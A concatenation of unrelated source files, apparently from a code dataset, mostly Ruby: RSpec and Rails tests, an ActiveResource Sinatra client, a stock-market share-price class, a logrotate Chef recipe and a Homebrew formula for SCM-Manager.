    # Each per-RPC config inherits from the parent's matching config when
    # the parent responds to it (a nil parent yields fresh defaults,
    # since nil does not respond to the RPC accessors).
    def initialize parent_rpcs = nil
      list_instances_config = parent_rpcs.list_instances if parent_rpcs.respond_to? :list_instances
      @list_instances = ::Gapic::Config::Method.new list_instances_config
      get_instance_config = parent_rpcs.get_instance if parent_rpcs.respond_to? :get_instance
      @get_instance = ::Gapic::Config::Method.new get_instance_config
      create_instance_config = parent_rpcs.create_instance if parent_rpcs.respond_to? :create_instance
      @create_instance = ::Gapic::Config::Method.new create_instance_config
      update_instance_config = parent_rpcs.update_instance if parent_rpcs.respond_to? :update_instance
      @update_instance = ::Gapic::Config::Method.new update_instance_config
      update_parameters_config = parent_rpcs.update_parameters if parent_rpcs.respond_to? :update_parameters
      @update_parameters = ::Gapic::Config::Method.new update_parameters_config
      delete_instance_config = parent_rpcs.delete_instance if parent_rpcs.respond_to? :delete_instance
      @delete_instance = ::Gapic::Config::Method.new delete_instance_config
      apply_parameters_config = parent_rpcs.apply_parameters if parent_rpcs.respond_to? :apply_parameters
      @apply_parameters = ::Gapic::Config::Method.new apply_parameters_config
      yield self if block_given?
    end
  end
end
end
end
end
end
end
end
| 52.075328 | 132 | 0.567766 |
5d155d28f8d3e0ff99466be5c3acbe3f9fa2d7ac | 993 | require 'rails_helper'
# Request specs verifying that every Admin V1 coupon endpoint rejects users
# with the :client profile (coupon management is admin-only).
RSpec.describe "Admin V1 Coupons as :client", type: :request do
  # Non-admin user whose auth headers are attached to every request below.
  let(:user) { create(:user, profile: :client) }

  context "GET /coupons" do
    let(:url) { "/admin/v1/coupons" }
    # NOTE(review): holds a list of 5 coupons despite the singular name —
    # presumably unused by the shared example; consider renaming to :coupons.
    let!(:coupon) { create_list(:coupon, 5) }

    before(:each) { get url, headers: auth_header(user) }

    # Shared example asserting the request is rejected as forbidden.
    include_examples "forbidden access"
  end

  context "POST /coupons" do
    let(:url) { "/admin/v1/coupons" }

    before(:each) { post url, headers: auth_header(user) }

    include_examples "forbidden access"
  end

  context "PATCH /coupons/:id" do
    # An existing coupon whose id builds the member-route URL.
    let!(:coupon) { create(:coupon) }
    let(:url) { "/admin/v1/coupons/#{coupon.id}" }

    before(:each) { patch url, headers: auth_header(user) }

    include_examples "forbidden access"
  end

  context "DELETE /coupons/:id" do
    # An existing coupon whose id builds the member-route URL.
    let!(:coupon) { create(:coupon) }
    let(:url) { "/admin/v1/coupons/#{coupon.id}" }

    before(:each) { delete url, headers: auth_header(user) }

    include_examples "forbidden access"
  end
end
| 30.090909 | 63 | 0.649547 |
1afcbfd44cf80e04192156b34d360e61a563638f | 887 | module AeEasy
module Qa
# Validates a batch of externally supplied records and accumulates any
# validation failures in {#errors}.
class ValidateExternal
  attr_reader :data, :errors, :rules, :outputs, :collection_name, :options

  # data            - records to validate
  # config          - configuration hash; only 'individual_validations' is read
  # outputs         - destination handed to SaveOutput when persisting results
  # collection_name - name of the collection the records belong to
  # options         - extra options forwarded to SaveOutput
  def initialize(data, config, outputs, collection_name, options)
    @data = data
    @rules = config['individual_validations'] if config
    @outputs = outputs
    @collection_name = collection_name
    @options = options
    # Records that fail validation are collected under :errored_items.
    @errors = { errored_items: [] }
  end

  # Runs group validations, then per-rule validations (when rules are
  # configured), and persists a summary via SaveOutput. Returns the errors
  # hash, or nil when any step raises (the failure is logged to stdout).
  def run
    if data.any?
      ValidateGroups.new(data, nil, collection_name, errors).run
      ValidateRules.new(data, errors, rules).run if rules
    end
    SaveOutput.new(data.count, rules, errors, collection_name, outputs, options).run
    errors
  rescue StandardError => e
    puts "An error has occurred: #{e}"
    nil
  end
end
end
end
| 28.612903 | 90 | 0.600902 |
87948f74fa492ff92480feba39e2592ad44ae2a9 | 5,525 | describe 'Ridgepole::Client#diff -> migrate' do
# Foreign-key change scenarios. Each context defines the schema currently in
# the database (actual_dsl) and the target schema (expected_dsl), then asserts
# that diff produces a delta and that migrating converges on expected_dsl.
# The erbh/cond helpers adjust the DSL per ActiveRecord version.
context 'when change fk' do
  let(:actual_dsl) {
    erbh(<<-EOS)
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      add_foreign_key "child", "parent", name: "child_ibfk_1", on_delete: :cascade
    EOS
  }
  # Same schema as actual_dsl but with tables in dump (sorted) order.
  let(:sorted_actual_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent", name: "child_ibfk_1", on_delete: :cascade
    EOS
  }
  # Target: the fk loses its on_delete: :cascade option.
  let(:expected_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent", name: "child_ibfk_1"
    EOS
  }
  before { subject.diff(actual_dsl).migrate }
  subject { client }
  it {
    delta = subject.diff(expected_dsl)
    expect(delta.differ?).to be_truthy
    expect(subject.dump).to match_fuzzy sorted_actual_dsl
    delta.migrate
    expect(subject.dump).to match_fuzzy expected_dsl
  }
end

# Same scenario as above but the fk has no explicit name.
context 'when change fk without name' do
  let(:actual_dsl) {
    erbh(<<-EOS)
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      add_foreign_key "child", "parent", on_delete: :cascade
    EOS
  }
  let(:sorted_actual_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent", on_delete: :cascade
    EOS
  }
  let(:expected_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent"
    EOS
  }
  before { subject.diff(actual_dsl).migrate }
  subject { client }
  it {
    delta = subject.diff(expected_dsl)
    expect(delta.differ?).to be_truthy
    expect(subject.dump).to match_fuzzy sorted_actual_dsl
    delta.migrate
    expect(subject.dump).to match_fuzzy expected_dsl
  }
end

# Replacing the referenced parent table (and fk name) entirely.
context 'when drop/add fk with parent table' do
  let(:actual_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent", name: "child_ibfk_1"
    EOS
  }
  let(:expected_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent2_id"
        t.index ["parent2_id"], name: "par2_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent2", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent2", name: "child_ibfk_2"
    EOS
  }
  before { subject.diff(actual_dsl).migrate }
  subject { client }
  it {
    delta = subject.diff(expected_dsl)
    expect(delta.differ?).to be_truthy
    expect(subject.dump).to match_fuzzy actual_dsl
    delta.migrate
    expect(subject.dump).to match_fuzzy expected_dsl
  }
end

# As above, but both fks are anonymous.
context 'when drop/add fk with parent table without name' do
  let(:actual_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent_id"
        t.index ["parent_id"], name: "par_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent"
    EOS
  }
  let(:expected_dsl) {
    erbh(<<-EOS)
      create_table "child", force: :cascade do |t|
        t.integer "parent2_id"
        t.index ["parent2_id"], name: "par2_id", <%= i cond(5.0, using: :btree) %>
      end
      create_table "parent2", <%= i cond(5.1, id: :integer) %>, force: :cascade do |t|
      end
      add_foreign_key "child", "parent2"
    EOS
  }
  before { subject.diff(actual_dsl).migrate }
  subject { client }
  it {
    delta = subject.diff(expected_dsl)
    expect(delta.differ?).to be_truthy
    expect(subject.dump).to match_fuzzy actual_dsl
    delta.migrate
    expect(subject.dump).to match_fuzzy expected_dsl
  }
end
end
| 28.188776 | 88 | 0.565611 |
f77c1b59f0a2054b3ccbf0a40dfcfd223ef6e814 | 4,278 | require 'rails_helper'
# System spec for the "before you start" interstitial shown before uploading
# a replacement certificate, covering each component (MSA / VSP / SP) and
# both key types (encryption / signing).
RSpec.describe 'Before you start page', type: :system do
  include CertificateSupport

  let(:user) { login_certificate_manager_user }
  # One certificate per component/key-type combination, owned by the user's team.
  let(:msa_encryption_certificate) { create(:msa_encryption_certificate, component: create(:msa_component, team_id: user.team)) }
  let(:sp_encryption_certificate) { create(:sp_encryption_certificate, component: create(:sp_component, team_id: user.team)) }
  let(:vsp_encryption_certificate) { create(:vsp_encryption_certificate, component: create(:sp_component, vsp: true, team_id: user.team)) }
  let(:msa_signing_certificate) { create(:msa_signing_certificate, component: create(:msa_component, team_id: user.team)) }
  let(:sp_signing_certificate) { create(:sp_signing_certificate, component: create(:sp_component, team_id: user.team)) }
  let(:vsp_signing_certificate) { create(:vsp_signing_certificate, component: create(:sp_component, vsp: true, team_id: user.team)) }

  before(:each) do
    login_certificate_manager_user
    # Pre-create replacement events so each encryption certificate is mid-rotation.
    ReplaceEncryptionCertificateEvent.create(
      component: sp_encryption_certificate.component,
      encryption_certificate_id: sp_encryption_certificate.id
    )
    ReplaceEncryptionCertificateEvent.create(
      component: msa_encryption_certificate.component,
      encryption_certificate_id: msa_encryption_certificate.id
    )
    ReplaceEncryptionCertificateEvent.create(
      component: vsp_encryption_certificate.component,
      encryption_certificate_id: vsp_encryption_certificate.id
    )
  end

  context 'encryption journey' do
    it 'shows before you start page for msa encryption and successfully goes to next page' do
      visit before_you_start_path(msa_encryption_certificate.id)
      expect(page).to have_content 'Matching Service Adapter (MSA) encryption certificate'
      click_link 'I have updated my MSA configuration'
      expect(current_path).to eql upload_certificate_path(msa_encryption_certificate.id)
    end

    it 'shows before you start page for vsp encryption and successfully goes to next page' do
      visit before_you_start_path(vsp_encryption_certificate.id)
      expect(page).to have_content 'Verify Service Provider (VSP) encryption certificate'
      click_link 'I have updated my VSP configuration'
      expect(current_path).to eql upload_certificate_path(vsp_encryption_certificate.id)
    end

    it 'shows before you start page for sp encryption and successfully goes to next page' do
      visit before_you_start_path(sp_encryption_certificate.id)
      expect(page).to have_content 'service provider encryption certificate'
      click_link 'I have updated my service provider configuration'
      expect(current_path).to eql upload_certificate_path(sp_encryption_certificate.id)
    end

    # The second path argument flags "no dual running" and changes the copy.
    it 'sp encryption journey with dual running set to no displays unqiue content' do
      visit before_you_start_path(sp_encryption_certificate.id, true)
      expect(page).to have_content 'Because your service provider does not support dual running, there will be an outage when you rotate the encryption key.'
    end
  end

  context 'signing journey' do
    it 'shows before you start page for msa signing and successfully goes to next page' do
      visit before_you_start_path(msa_signing_certificate.id)
      expect(page).to have_content 'Matching Service Adapter (MSA) signing certificate'
      click_link t('user_journey.before_you_start.have_updated', component: msa_signing_certificate.component.display)
      expect(current_path).to eql upload_certificate_path(msa_signing_certificate.id)
    end

    it 'shows before you start page for vsp signing and successfully goes to next page' do
      visit before_you_start_path(vsp_signing_certificate.id)
      expect(page).to have_content 'Verify Service Provider (VSP) signing certificate'
      click_link 'Continue'
      expect(current_path).to eql upload_certificate_path(vsp_signing_certificate.id)
    end

    it 'shows before you start page for sp signing and successfully goes to next page' do
      visit before_you_start_path(sp_signing_certificate.id)
      expect(page).to have_content 'service provider signing certificate'
      click_link 'Continue'
      expect(current_path).to eql upload_certificate_path(sp_signing_certificate.id)
    end
  end
end
| 52.814815 | 157 | 0.77957 |
bf9ae9091f10d52cef0b7b5c1d55c74a8b803577 | 1,211 | module AsposeWordsCloud
#
# Payload for a document-protection request: the current password, the
# replacement password and the protection type to apply.
class ProtectionRequest < BaseObject
  attr_accessor :password, :new_password, :protection_type

  # Maps ruby-style attribute names onto their JSON keys.
  def self.attribute_map
    {
      password: :Password,
      new_password: :NewPassword,
      protection_type: :ProtectionType
    }
  end

  # Swagger type of each attribute.
  def self.swagger_types
    {
      password: :String,
      new_password: :String,
      protection_type: :String
    }
  end

  # Builds the request from a hash keyed by JSON names (string or symbol
  # keys both accepted). A non-hash or empty argument leaves all
  # attributes unset.
  def initialize(attributes = {})
    return unless attributes.is_a?(Hash) && !attributes.empty?

    # Normalise string keys to symbols before reading.
    normalized = attributes.each_with_object({}) { |(key, value), acc| acc[key.to_sym] = value }

    self.password = normalized[:Password] if normalized[:Password]
    self.new_password = normalized[:NewPassword] if normalized[:NewPassword]
    self.protection_type = normalized[:ProtectionType] if normalized[:ProtectionType]
  end
end
end
| 22.425926 | 79 | 0.554913 |
288738db377e6faa9f106cb1c29773e35bc531df | 2,998 | require File.expand_path('./spec_helper', File.dirname(__FILE__))
# Specs some of the behavior of awesome_nested_set although does so to
# demonstrate the use of this gem
# Exercises the Comment model's nested-set behaviour (awesome_nested_set)
# and its finder class methods.
describe Comment do
  before do
    @user = User.create!
    @comment = Comment.create!(body: 'Root comment', user: @user)
  end

  describe 'that is valid' do
    it 'should have a user' do
      expect(@comment.user).not_to be_nil
    end

    it 'should have a body' do
      expect(@comment.body).not_to be_nil
    end
  end

  it 'should not have a parent if it is a root Comment' do
    expect(@comment.parent).to be_nil
  end

  it 'can have see how child Comments it has' do
    expect(@comment.children.size).to eq(0)
  end

  it 'can add child Comments' do
    grandchild = Comment.new(body: 'This is a grandchild', user: @user)
    grandchild.save!
    # move_to_child_of re-parents the saved node inside the nested set.
    grandchild.move_to_child_of(@comment)
    expect(@comment.children.size).to eq(1)
  end

  describe 'after having a child added' do
    before do
      @child = Comment.create!(body: 'Child comment', user: @user)
      @child.move_to_child_of(@comment)
    end

    it 'can be referenced by its child' do
      expect(@child.parent).to eq(@comment)
    end

    it 'can see its child' do
      expect(@comment.children.first).to eq(@child)
    end
  end

  describe 'finders' do
    describe '#find_comments_by_user' do
      before :each do
        @other_user = User.create!
        @user_comment = Comment.create!(body: 'Child comment', user: @user)
        @non_user_comment = Comment.create!(body: 'Child comment',
                                            user: @other_user)
        @comments = Comment.find_comments_by_user(@user)
      end

      it 'should return all the comments created by the passed user' do
        expect(@comments).to include(@user_comment)
      end

      it 'should not return comments created by non-passed users' do
        expect(@comments).not_to include(@non_user_comment)
      end
    end

    describe '#find_comments_for_commentable' do
      before :each do
        @other_user = User.create!
        # Comments attach to a polymorphic commentable (here: a User record).
        @user_comment =
          Comment.create!(body: 'from user',
                          commentable_type: @other_user.class.to_s,
                          commentable_id: @other_user.id,
                          user: @user)
        @other_comment =
          Comment.create!(body: 'from other user',
                          commentable_type: @user.class.to_s,
                          commentable_id: @user.id,
                          user: @other_user)
        @comments =
          Comment.find_comments_for_commentable(@other_user.class,
                                                @other_user.id)
      end

      it 'should return the comments for the passed commentable' do
        expect(@comments).to include(@user_comment)
      end

      it 'should not return the comments for non-passed commentables' do
        expect(@comments).not_to include(@other_comment)
      end
    end
  end
end
| 29.98 | 75 | 0.61441 |
182a2af9da678b46d385e902be50ff9b594d1e59 | 157 | class SwapProjectDataManagementPlansRelationship < ActiveRecord::Migration[6.0]
def change
  # Drops the data_management_plan reference (FK column) from projects.
  # NOTE(review): per the migration's name the relationship is presumably
  # being swapped to the other side — confirm the companion migration exists.
  remove_reference :projects, :data_management_plan
end
end
| 26.166667 | 79 | 0.821656 |
e2e784d19f2916265a72824cc89c63768fe3d6d7 | 1,609 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# GRPC contains the General RPC module.
module GRPC
  # Gem version string. Frozen so the shared constant cannot be mutated at
  # runtime (the file predates frozen_string_literal).
  VERSION = '1.5.0.dev'.freeze
end
| 47.323529 | 72 | 0.778745 |
39acc66236e6a6f1a25e874c8685c70d1aeb2313 | 372 | case node[:platform]
when "ubuntu"
package "logrotate"
LOGROTATE_CONF_BASEDIR = "/etc/logrotate.d"
end
# Render one logrotate config per app declared under node.logrotate.apps
# (safe navigation makes this a no-op when the attribute is unset).
node.logrotate.apps&.each do |app|
  # Fixed: local was previously misspelled ("logroate_conf_dir"), so the
  # template resource below raised NameError at converge time.
  logrotate_conf_dir = "#{LOGROTATE_CONF_BASEDIR}/#{app.name}"

  template logrotate_conf_dir do
    action :create # fixed typo — was ":craete", an invalid action
    mode "644"
    source "templates/etc/logrotate.d/logrotate.conf"
    variables(configs: app.configs)
  end
end
| 23.25 | 61 | 0.731183 |
6a67021a71277e385139adf4788d37d0fd182700 | 245 | class RedactorRails::Asset
include Mongoid::Document
include Mongoid::Timestamps
include RedactorRails::Orm::Mongoid::AssetBase

# Expose the common upload attributes straight from the underlying data object.
delegate :url, :current_path, :size, :content_type, :filename, to: :data

# Modern validation macro; behaviour identical to validates_presence_of.
validates :data, presence: true
end
| 24.5 | 74 | 0.771429 |
7a702a7ea51d2ee16ae944a46432b209b99ee3e6 | 2,440 | # frozen_string_literal: true
require 'rails_helper'
require 'support/sm_client_helpers'
require 'support/shared_examples_for_mhv'
# Request specs for the secure-messaging attachment endpoint, checking access
# by MHV account level (Basic / Advanced / Premium) and VA-patient status.
RSpec.describe 'Message Attachments Integration' do
  include SM::ClientHelpers

  let(:va_patient) { true }
  let(:current_user) { build(:user, :mhv, va_patient: va_patient, mhv_account_type: mhv_account_type) }
  let(:user_id) { '10616687' }
  let(:inbox_id) { 0 }
  let(:message_id) { 573_302 }

  before do
    # Stub the SM client so no real upstream calls are made.
    allow(SM::Client).to receive(:new).and_return(authenticated_client)
    sign_in_as(current_user)
  end

  context 'Basic User' do
    let(:mhv_account_type) { 'Basic' }
    before { get '/v0/messaging/health/messages/629999/attachments/629993' }

    include_examples 'for user account level', message: 'You do not have access to messaging'
    include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
  end

  context 'Advanced User' do
    let(:mhv_account_type) { 'Advanced' }
    before { get '/v0/messaging/health/messages/629999/attachments/629993' }

    include_examples 'for user account level', message: 'You do not have access to messaging'
    include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
  end

  context 'Premium User' do
    let(:mhv_account_type) { 'Premium' }

    context 'not a va patient' do
      before { get '/v0/messaging/health/messages/629999/attachments/629993' }

      # Premium but not a VA patient is still denied.
      let(:va_patient) { false }
      let(:current_user) do
        build(:user, :mhv, :no_vha_facilities, va_patient: va_patient, mhv_account_type: mhv_account_type)
      end

      include_examples 'for non va patient user', authorized: false, message: 'You do not have access to messaging'
    end

    describe '#show' do
      it 'responds sending data for an attachment' do
        VCR.use_cassette('sm_client/messages/nested_resources/gets_a_single_attachment_by_id') do
          get '/v0/messaging/health/messages/629999/attachments/629993'
        end

        # The attachment streams back as a binary PNG download.
        expect(response).to be_successful
        expect(response.headers['Content-Disposition'])
          .to eq("attachment; filename=\"noise300x200.png\"; filename*=UTF-8''noise300x200.png")
        expect(response.headers['Content-Transfer-Encoding']).to eq('binary')
        expect(response.headers['Content-Type']).to eq('image/png')
        expect(response.body).to be_a(String)
      end
    end
  end
end
| 35.362319 | 115 | 0.707787 |
38a6645dbf5edd81a4675d13eefffb274fd1efd8 | 330 | class Admin::HomeBannersController < Admin::BaseController
layout 'juntos_bootstrap'

# CRUD actions are supplied by InheritedResources; only those listed in
# `actions` are exposed, wired to the HomeBanner resource below.
inherit_resources
actions :index, :new, :create, :destroy, :edit, :update
defaults resource_class: HomeBanner, collection_name: 'home_banners', instance_name: 'home_banner'

# Inherited update, overridden only to redirect back to the index on success.
def update
  update! { admin_home_banners_path }
end
end
| 30 | 100 | 0.769697 |
87063f234ca03860d5e79e169e8a1fc31c207013 | 1,627 | # frozen_string_literal: true
module Engine
  # One cell of the stock-market grid: its price, colour band, par ability
  # and the corporations currently sitting on it.
  class SharePrice
    attr_reader :coordinates, :price, :color, :corporations, :can_par

    # Parses a market-code string such as "80p", "40b" or "50blk" into a
    # SharePrice at (row, column). Returns nil for a nil or empty code.
    def self.from_code(code, row, column, unlimited_colors, multiple_buy_colors: [])
      return nil unless code && code != ''

      parsed_price = code.gsub(/\D/, '').to_i
      par = code.include?('p')
      # NB: 'blk' must be tested before 'b', since it contains 'b'.
      band =
        if par
          :red
        elsif code.include?('blk')
          :black
        elsif code.include?('b')
          :brown
        elsif code.include?('o')
          :orange
        elsif code.include?('y')
          :yellow
        end

      new([row, column],
          price: parsed_price,
          can_par: par,
          color: band,
          unlimited_colors: unlimited_colors,
          multiple_buy_colors: multiple_buy_colors)
    end

    def initialize(coordinates,
                   price:,
                   can_par: false,
                   color: nil,
                   unlimited_colors: [],
                   multiple_buy_colors: [])
      @coordinates = coordinates
      @price = price
      @color = color
      @can_par = can_par
      @corporations = []
      @unlimited_colors = unlimited_colors
      @multiple_buy_colors = multiple_buy_colors
    end

    # Stable identifier: "<price>,<row>,<column>".
    def id
      ([@price] + @coordinates).join(',')
    end

    # A cell counts against the certificate limit unless its colour is
    # flagged as unlimited.
    def counts_for_limit
      !@unlimited_colors.include?(@color)
    end

    # Whether multiple shares may be bought at once on this colour band.
    def buy_multiple?
      @multiple_buy_colors.include?(@color)
    end

    def to_s
      format('%s - %s %s', self.class.name, @price, @coordinates)
    end
  end
end
| 24.651515 | 84 | 0.532883 |
18f021f3f8e2218d899d01ac3957263b38b6c5c8 | 3,268 | require 'pry'
require 'sinatra/base'
require 'slim'
require 'activeresource'
# Active Resource Test client
module ActiveResourceTest
# Handle JSON response
class JsonFormatter
include ActiveResource::Formats::JsonFormat
attr_reader :collection_name
def initialize(collection_name)
@collection_name = collection_name.to_s
end
def decode(json)
remove_root(ActiveSupport::JSON.decode(json))
end
private
def remove_root(data)
if data.is_a?(Hash) && data[collection_name]
data[collection_name]
else
data
end
end
end
# Base class
class Base < ActiveResource::Base
self.site = 'http://localhost:3000'
self.include_root_in_json = true
self.format = JsonFormatter.new( :collection_name )
end
# Author class
class Writer < Base
# self.element_name = 'writer'
end
# Book class
class Book < Base; end
# Category class
class Category < Base; end
# Chapter class
class Chapter < Base; end
# Tag class
class Tag < Base; end
# Main class
class App < Sinatra::Application
configure do
set :port, 4000
set :views, settings.root
end
before do
@models ||= { writers: Writer, books: Book, categories: Category, chapters: Chapter, tags: Tag }
@links ||= [
[ '/', 'Main' ],
[ '/writers', 'Authors' ],
[ '/books', 'Books' ],
[ '/categories', 'Categories' ],
[ '/chapters', 'Chapters' ],
[ '/tags', 'Tags' ]
]
end
get '/' do
@details = OpenStruct.new( attributes: {} )
slim 'h2 Main', layout: :layout
end
# List
get '/:model' do
mod = @models[params[:model].to_sym]
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
@list = mod.all
slim "h2 #{params[:model]}", layout: :layout
end
# Create
post '/:model' do
mod = @models[params[:model].to_sym]
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
mod.new( @model => params[@model] ).save
redirect to "/#{params[:model]}"
end
# Read
get '/:model/:id' do
mod = @models[params[:model].to_sym]
@details = mod.find( params[:id] )
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
slim "h2 #{params[:model]}", layout: :layout
end
# Update
post '/:model/:id' do
mod = @models[params[:model].to_sym]
@details = mod.find( params[:id] )
@model = mod.to_s.split( '::' ).last.gsub( /([A-Z]+)([A-Z][a-z])/, '\1_\2' ).gsub( /([a-z\d])([A-Z])/, '\1_\2' ).tr( '-', '_' ).downcase
params[@model].each { |k, v| @details.send( "#{k}=", v ) }
@details.save
redirect to "/#{params[:model]}"
end
# Delete
get '/:model/:id/delete' do
@item = @models[params[:model].to_sym].find( params[:id] )
@item.destroy
redirect to "/#{params[:model]}"
end
run! if app_file == $PROGRAM_NAME # = $0 ## starts the server if executed directly by ruby
end
end
| 25.936508 | 142 | 0.554774 |
5d25afaa69121f645043a7d2712b3501f7bfec1b | 970 | require 'test_helper'
class UsersSignupTest < ActionDispatch::IntegrationTest
  # Invalid form data must not create a user and should re-render the form.
  test "invalid signup information" do
    get signup_path
    assert_no_difference 'User.count' do
      post users_path, params: { user: { name: "",
                                         email: "user@invalid",
                                         password: "foo",
                                         password_confirmation: "bar" } }
    end
    assert_template 'users/new'
  end

  # Valid form data creates exactly one user, redirects to the profile page
  # and leaves the new user logged in.
  test "valid signup information" do
    get signup_path
    assert_difference 'User.count', 1 do
      post users_path, params: { user: { name: "Example User",
                                         email: "[email protected]",
                                         password: "password",
                                         password_confirmation: "password" } }
    end
    follow_redirect!
    assert_template 'users/show'
    assert is_logged_in?
  end
end
| 33.448276 | 78 | 0.505155 |
3350563aca17e5aad09c115abd4bcdf1c3bf720d | 128 | class Line < ActiveRecord::Base
belongs_to :script
belongs_to :actor
has_many :translations

# Legacy mass-assignment whitelist (protected_attributes-era Rails):
# only :index may be set via mass assignment.
attr_accessible :index
end
| 16 | 31 | 0.773438 |
bf7e61c7576e63676aab30caa905bc26fabf1438 | 2,278 | class ScmManager < Formula
desc "Manage Git, Mercurial, and Subversion repos over HTTP"
homepage "https://www.scm-manager.org"
url "https://maven.scm-manager.org/nexus/content/repositories/releases/sonia/scm/scm-server/1.47/scm-server-1.47-app.tar.gz"
version "1.47"
sha256 "58e86e0cd3465733a14db09d95a0ef72906b69df1341140ee7d0329a5bbe47a3"

bottle do
  cellar :any_skip_relocation
  sha256 "d16a74d953954dfbc1d788ae62fe0a279248570d5a5d173949f997020b326962" => :el_capitan
  sha256 "d37319696b700361b7a9e2c0daf3e5f2de6b21bcb69d04bb963c775d73337f65" => :yosemite
  sha256 "10f94fa5dafdb40dbcf6a7744a98b2433e294af16e7712a572de49daaed031e0" => :mavericks
end

depends_on :java => "1.6+"

# Standalone command-line client jar, installed under libexec/tools.
resource "client" do
  url "https://maven.scm-manager.org/nexus/content/repositories/releases/sonia/scm/clients/scm-cli-client/1.47/scm-cli-client-1.47-jar-with-dependencies.jar"
  version "1.47"
  sha256 "d4424b9d5104a1668f90278134cbe86a52d8bceba7bc85c4c9f5991debc54739"
end

def install
  # Windows launchers are not needed on macOS.
  rm_rf Dir["bin/*.bat"]
  libexec.install Dir["*"]
  # Wrapper script that pins JAVA_HOME to a 1.6+ JVM before starting the server.
  (bin/"scm-server").write <<-EOS.undent
    #!/bin/bash
    BASEDIR="#{libexec}"
    REPO="#{libexec}/lib"
    export JAVA_HOME=$(/usr/libexec/java_home -v 1.6)
    "#{libexec}/bin/scm-server" "$@"
  EOS
  chmod 0755, bin/"scm-server"
  tools = libexec/"tools"
  tools.install resource("client")
  # Wrapper around the CLI client jar.
  scm_cli_client = bin/"scm-cli-client"
  scm_cli_client.write <<-EOS.undent
    #!/bin/bash
    java -jar "#{tools}/scm-cli-client-#{version}-jar-with-dependencies.jar" "$@"
  EOS
  chmod 0755, scm_cli_client
end

plist_options :manual => "scm-server start"

# launchd job: start the server when the job is loaded.
def plist; <<-EOS.undent
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
    <key>Label</key>
    <string>#{plist_name}</string>
    <key>ProgramArguments</key>
    <array>
      <string>#{opt_bin}/scm-server</string>
      <string>start</string>
    </array>
